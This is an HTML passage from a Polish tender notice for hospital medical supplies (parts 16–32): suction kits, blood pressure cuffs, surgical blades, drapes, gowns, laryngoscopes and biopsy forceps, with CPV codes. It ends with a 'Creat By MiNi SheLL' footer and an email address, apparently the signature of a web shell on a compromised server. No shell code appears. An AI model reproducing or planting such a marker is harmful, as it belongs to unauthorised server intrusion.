<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zawiera 2 szczoteczki do zębów z odsysaniem z zastawką do regulacji siły odsysania i gąbką na górnej powierzchni pokrytą dwuwęglanem sodu, 4 gąbki poksoduryte dwuwęglanem sodu z odsysaniem z zastawką do regulacji siły odsysania oraz z zgiętymi końcówkami, 2 jednorazowe opakowania bezalkoholowego płynu do płukania jamy ustnej z 0,05% roztworem chlorku cetylopirydyny, 4 jednorazowe opakowania bezalkoholowego płynu do płukania jamy ustnej z 1,5% roztworem nadtlenku wodoru, 6 gąbek-aplikatorów oraz 6 jednorazowych opakowań preparatu nawilżającego do ust na bazie wodnej.	zestaw	80
Zestaw do odsysania jamy ustnej, uchwyt ssący z zastawką, z suwakową regulacją siły ssania, cewnik z osłonką i z silikonową końcówką o długości roboczej min. 14 cm, zestaw łączników: łącznik  Y do układu ssącego. Opakowanie 60 zestawów.	op.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16 Mankiety do pomiaru nieinwazyjnego RR  jednoprzewodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mankiet do automatycznego nieinwazyjnego monitorowania ciśnienia krwi kompatybilny z monitorami Agilent, Emtel,Datex Ohmeda  wielorazowego użytku, mankiety naramienne i udowe, zapinane na rzepy bez klamry metalowej, bezlateksowe, materiał odporny na zużycie, nadający się do mycia, wskaźniki pozwalające na właściwe założenie mankietu, wyraźne oznakowanie rozmiaru mankietu odpowiadające obwodowi kończyny, elastyczny, wytrzymały przewód powietrzny, złącza kompatybilne z monitorami jednoprzewodowymi, minimalny obwód kończyny 7cm, maksymalny 50cm, zakres pomiaru 0-300mmHg, mankiety w rozmiarach 22-35 cm + -10, szerokość mankietu 6-20cm, gwarancja min. 1 rok	szt.	6
Mankiet do automatycznego nieinwazyjnego monitorowania ciśnienia krwi kompatybilny z monitorami Agilent, Emtel, Datex Ohmeda wielorazowego użytku, mankiety naramienne i udowe, zapinane na rzepy bez klamry metalowe, bezlateksowe, materiał odporny na zużycie, nadający się do mycia, wskaźniki pozwalające na właściwe założenie mankietu, wyraźne oznakowanie rozmiaru mankietu odpowiadające obwodowi kończyny, elastyczny, wytrzymały przewód powietrzny, złącza kompatybilne z monitorami jednoprzewodowymi, minimalny obwód kończyny 7cm, maksymalny 50cm, zakres pomiaru 0 300mmHg, mankiety w rozmiarach 38 40 cm + -10, szerokość mankietu 6 20cm, gwarancja min. 1 rok	szt.	6
Mankiet do automatycznego nieinwazyjnego monitorowania ciśnienia krwi kompatybilny z monitorami Agilent, Emtel, Datex Ohmeda wielorazowego użytku, mankiety naramienne i udowe, zapinane na rzepy bez klamry metalowej, bezlateksowe, materiał odporny na zużycie, nadający się do mycia, wskaźniki pozwalające na właściwe założenie mankietu, wyraźne oznakowanie rozmiaru mankietu odpowiadające obwodowi kończyny, elastyczny, wytrzymały przewód powietrzny, złącza kompatybilne z monitorami jednoprzewodowymi, minimalny obwód kończyny 7cm, maksymalny 50cm, zakres pomiaru 0 300mmHg, mankiety w rozmiarach 38 50 cm +-10 , szerokość mankietu 6 20cm, gwarancja min. 1 rok	szt.	2
Mankiet pediatryczny do automatycznego nieinwazyjnego monitorowania ciśnienia krwi kompatybilny z monitorem Philips C 3 wielorazowego użytku, mankiety naramienne , zapinane na rzepy bez klamry metalowej, bezlateksowe, materiał odporny na zużycie, nadający się do mycia, wskaźniki pozwalające na właściwe założenie mankietu, wyraźne oznakowanie rozmiaru mankietu odpowiadające obwodowi kończyny, elastyczny, wytrzymały przewód powietrzny, złącza kompatybilne z monitorami jednoprzewodowymi, szerokość 8 17 cm +- 10, gwarancja min. 1 rok	szt	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17 Mankiety do pomiaru nieinwazyjnego RR  dwuprzewodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mankiet do automatycznego nieinwazyjnego monitorowania ciśnienia krwi kompatybilny z monitorami Agilent, Emtel, Datex Ohmeda wielorazowego użytku, mankiety naramienne i udowe, zapinane na rzepy bez klamry metalowej, bezlateksowe, materiał odporny na zużycie, nadający się do mycia, wskaźniki pozwalające na właściwe założenie mankietu, wyraźne oznakowanie rozmiaru mankietu odpowiadające obwodowi kończyny, elastyczny, wytrzymały przewód powietrzny, złącza kompatybilne z monitorami dwuprzewodowymi, minimalny obwód kończyny 7cm, maksymalny 50cm, zakres pomiaru 0 300mmHg, mankiety w rozmiarach 22 35 cm +-10, szerokość mankietu 620cm, gwarancja min. 1 rok	szt.	7
Mankiet do automatycznego nieinwazyjnego monitorowania ciśnienia krwi kompatybilny z monitorami Agilent, Emtel, DatexOhmeda wielorazowego użytku, mankiety naramienne i udowe, zapinane na rzepy bez klamry metalowej, bezlateksowe, materiał odporny na zużycie, nadający się do mycia, wskaźniki pozwalające na właściwe założenie mankietu, wyraźne oznakowanie rozmiaru mankietu odpowiadające obwodowi kończyny, elastyczny, wytrzymały przewód powietrzny, złącza kompatybilne z monitorami dwuprzewodowymi, minimalny obwód kończyny 7cm, maksymalny 50cm, zakres pomiaru 0 300mmHg, mankiety w rozmiarach 38 40 cm +-10, szerokość mankietu 6 20cm, gwarancja min. 1 rok	szt.	7
Mankiet do automatycznego nieinwazyjnego monitorowania ciśnienia krwi kompatybilny z monitorami Agilent, Emtel, Datex Ohmeda wielorazowego użytku, mankiety naramienne i udowe, zapinane na rzepy bez klamry metalowej, bezlateksowe, materiał odporny na zużycie, nadający się do mycia, wskaźniki pozwalające na właściwe założenie mankietu, wyraźne oznakowanie rozmiaru mankietu odpowiadające obwodowi kończyny, elastyczny, wytrzymały przewód powietrzny, złącza kompatybilne z monitorami dwuprzewodowymi, minimalny obwód kończyny 7cm, maksymalny 50cm, zakres pomiaru 0 300mmHg, mankiety w rozmiarach 38-50 cm +-10, szerokość mankietu 620cm, gwarancja min. 1 rok	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie nr 18 Ciśnieniomierze zegarowe i części zamienne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękaw ciśnieniomierza z dwoma drenami na rzepy bez klamry	sztuka	100
Rękaw ciśnieniomierza z jednym drenem na rzepy bez klamry	sztuka	30
Gruszka ciśnieniomierza z 2 zaworami PCV	sztuka	50
Manometr do ciśnieniomierza zegarowego	sztuka	50
Głowica stetoskopu płaskiego	sztuka	30
Przewody do EKG Aspel  ASCARD	sztuka	5
Elektrody klipsowe kończynowe do EKG ( czerwona, żółta, czarna, zielona)	komp.	10
Elektrody przedsercowe(przyssawki) do EKG	komp.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.42.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie nr 19 Czujnik do saturacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czujnik opuszkowy kompatybilny z kardiomonitorem Philips C 3, rozmiar M 1195 A	sztuka	1
Czujnik silikonowy dla dorosłych na palec kompatybilny z monitorem FM, CAM( Datex- Ohmeda), prostokątne wejście do modułu, zintegrowany.	sztuka	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie nr 20 Ostrza chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ostrze chirurgiczne wymienne, nazwa i numer ostrza wygrawerowane bezpośrednio na ostrzu, rozmiar: nr 10 /opakowanie 100szt/ 	100sztuk	15
Ostrze chirurgiczne wymienne, nazwa i numer ostrza wygrawerowane bezpośrednio na ostrzu, rozmiar: nr 14 /opakowanie 100szt/ 	100sztuk	6
Ostrze chirurgiczne wymienne, nazwa i numer ostrza wygrawerowane bezpośrednio na ostrzu, rozmiar: nr 20 /opakowanie 100szt/ 	100sztuk	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie nr 21 Serweta z włókniny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serwetka z włókniny polipropylenowej jałowa, jednorazowa , epiduralna, dwu-trzy warstwowa z centralnym otworem, włóknina dobrze wchłanialna , samoprzylepna: wielkość serwety 60x100 cm ,prostokątna z otworem w środku-10cmx1 5cm,	szt	250
Serwetka z włókniny polipropylenowej jałowa, jednorazowa , epiduralna, dwu-trzy warstwowa z centralnym otworem, włóknina dobrze wchłanialna , samoprzylepna: 45x75 cm ,prostokątna z otworem w środku nr.5	szt.	250
Serwetka z włókniny polipropylenowej jałowa, jednorazowa , epiduralna, dwu-trzy warstwowa z centralnym otworem, włóknina dobrze wchłanialna , samoprzylepna: 45x45 cm ,prostokątna z otworem w środku nr.5	szt.	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie nr 22 Maski, czepki, fartuchy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czepek chirurgiczny w kolorze zielonym uniwersalny o kroju furażerki wykonany w części bocznej z włókniny pochłaniającej pot, zaś w części górnej z włókniny perforowanej, ściągnięty z tyłu gumką. Sposób pakowania w kartony gwarantujący higieniczne przechowywanie i wyjmowanie.	szt.	4000
Fartuch foliowy	sztuka	2500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie nr 23 Fartuchy chirurgiczne  sterylne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fartuch  wykonany z włókniny polipropylenowej trójwarstwowej typu SMS, zapewniająca barierę, oddychający na całej powierzchni, zapewniającej co najmniej minimalne parametry wg normy PN-EN 13795-1,2,3 dla wymagań wysokich strefy krytycznej i mniej krytycznej, steryny, pakowany w opakowanie zewnętrzne folia-papier, zapewniające zachowanie sterylności po wyjęciu z opakowania zewnętrznego lub w przypadku utraty szczelności lub rozdarciu zewnętrznego opakowania. Rękaw zakończony elastycznym mankietem, tylne części fartucha zachodzą na siebie, troki umieszczone w specjalnym kartoniku co umożliwia zachowanie jałowości. Rozmiar: L, L-xl, XL, XL-xl	sztuka	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie nr 24 Regulator ssania do wysokiej próżni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Regulator ssania do wysokiej próżni przeznaczony do regulowania ssania wytwarzanego przez system próżniowy, regulacja w zakresie minimum od 0 do 0,07MPa - gniazdo typu AGA	sztuka	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.13.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie nr 25 Reduktor do tlenu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Reduktor do tlenu z przepływomierzem i nawilżaczem, z pojemnikiem wielokrotnego użytku, pojemnik autoklawalny, typ złącza zasilającego - wtyk AGA.	sztuka	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.13.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadanie nr 26 Strzygarka chirurgiczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wypożyczenie na czas trwania umowy: Strzygarka chirurgiczna bezprzewodowa, wodoodporna, z nieruchomą głowicą, posiadająca włącznik z zabezpieczeniem przed przypadkowym uruchomieniem z możliwością dezynfekcji poprzez pełne zanurzenie strzygarki w środku dezynfekcyjnym (głębokość oraz czas zanurzenia opisany w instrukcji użytkowania strzygarki), dostępne co najmniej 3 różne typy kompatybilnych ostrzy jednorazowych. Niklowo- metaliczna bateria cechująca się brakiem efektu pamięci i długą żywotnością (wszelkie naprawy strzygarek, wymiany uszkodzonych, serwis w okresie umowy wliczony w cenę wypożyczenia)	szt	4
Wypożyczenia na czas trwania umowy Ładowarka indukcyjna bezkontaktowa z zabezpieczeniem przed przeładowaniem oraz możliwością postawienia lub zawieszenia (wszelkie naprawy ładowarek, wymiany uszkodzonych, serwis w okresie umowy wliczony w cenę wypożyczenia)	szt	4
Ostrze jednorazowe, standardowe, wysokość strzyżenia nie większa niż 0,25 mm, szerokość strzyżenia co najmniej 32 mm, posiadające widoczny nr seryjny(LOT) bezpośrednio na każdym ostrzu, pakowanie indywidualne w blister i opakowanie zbiorcze.	szt.	1000
Ostrze do okolic wrażliwych, jednorazowe, zwężone, wysokość strzyżenia nie większa niż 0,25 mm, szerokość strzyżenia co najmniej 20 mm, posiadające widoczny numer seryjny(LOT) bezpośrednio na każdym ostrzu, pakowane indywidualnie w blister i opakowanie zbiorcze.	szt.	1000
Ostrze neurochirugiczne jednorazowe, do głowy i włosów bardzo gęstych, wysokość strzyżenia nie większa niż 0,5 mm, szerokość strzyżenia co najmniej 32 mm, posiadające widoczny nr seryjny(LOT) bezpośrednio na każdym ostrzu, pakowane indywidualne w blister i opakowanie zbiorcze.	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.90.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zadanie nr 27 Laryngoskopy jednorazowe i łyżki jednorazowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw 3 łyżek Macintosch jednorazowego użytku wykonanych z tworzywa, światłowodowych, rozmiary łyżek 2, 3, 4. Rękojeść metalowa, światłowodowa. Miękkie etui.	zestaw	4
Łyżki jednorazowego użytku  Macintosch do laryngoskopu współpracujące ze standardowymi rękojeściami. Nr łyżki 3, 4.	szt	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zadanie nr 28 Pościel jednorazowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pościel jednorazowa wykonana z miękkiej, polipropylenowej, trzywarstwowej włókniny o gramaturze 25g/m2 w kolorze niebieskim. W skład kompletu wchodzi: prześcieradło 150 x 210 cm, poszwa 160 x 210 cm, poszewka 80 x 70 cm.	komp.	1500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Zadanie nr 29 Tace do leków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Taca do leków doustnych na 32 kieliszki, każdy zestaw ma zawierać wsuwki na szczegółowy opis. Wymiary 430 x325 x 60 mm	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Zadanie nr 30 Miska nerkowata jednorazowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miska nerkowata jednorazowego użytku o pojemności 700 ml	szt	2500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Zadanie nr 31 Kleszcze biopsyjne wielorazowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kleszcze biopsyjne do gastroskopii o przekroju 2,8 mm, długość 160 cm, łyżki podłużne z okienkiem i igłą	szt	5
Kleszcze biopsyjne do kolonoskopii o przekroju 3,2 mm, długość 230 cm, łyżki podłużne z okienkiem i igłą	szt	5
Pętla diatermiczna do gastroskopii heksagonalna o przekroju 2,8 mm, długości 160 cm, kompatybilna z diatermią ERBE, z rączką	szt	2
Pętla diatermiczna do kolonoskopii heksagonalna o przekroju 2,8 mm, długości 230 cm, kompatybilna z diatermią ERBE, z rączką	szt	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Zadanie nr 32 Urządzenie wielorazowego użytku do usuwania zszywek skórnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenie do usuwania zszywek skórnych, wielorazowego użytku, odporne na środki dezynfekcyjne	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com